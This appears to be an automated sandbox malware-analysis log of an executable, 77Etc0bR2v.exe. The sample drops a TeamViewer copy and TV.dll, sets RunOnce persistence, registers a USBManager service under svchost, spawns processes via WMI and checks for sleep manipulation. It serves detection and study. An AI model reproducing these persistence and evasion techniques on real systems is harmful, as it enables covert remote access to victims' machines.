Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\user\Desktop\77Etc0bR2v.exeJump to behavior
Source: 77Etc0bR2v.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewerJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Local\Temp\nsa6984.tmpJump to behavior
Source: classification engineClassification label: mal80.evad.winEXE@22/12@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF29D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,753CA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAPEAAAAA
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_01
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile created: C:\Program Files (x86)\QSJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 77Etc0bR2v.exeStatic file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFC101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0075C004 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0075BFE4 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFC101 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFC101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C1E67 push edx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C062B push edi; retf 0019h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C181B push ebp; retf 006Bh
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026CA91B push edx; retn 0064h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C1AF3 push esp; retf 0078h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C12D7 push ebp; retf 0054h
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 18_2_026C15B2 push ebp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026E3A8E push eax; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AD4F0 push esp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AD070 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AFB5E push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026AF306 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026B2686 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026CC376 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026CCC32 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026C9888 push eax; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 19_3_026C9D08 push esp; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_02813210 push eax; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027DFBC7 push es; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B6650 push cs; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B6A3C push es; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B7732 push esi; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 20_3_027B770F push ss; ret
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF44D0 FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,GetPrivateProfileIntA,InvertRect,InvertRect,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InvertRect,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,InvertRect,InvertRect,FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FFF68
Source: C:\Windows\System32\svchost.exe TID: 4668Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100Thread sleep count: 99 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100Thread sleep time: -49500s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
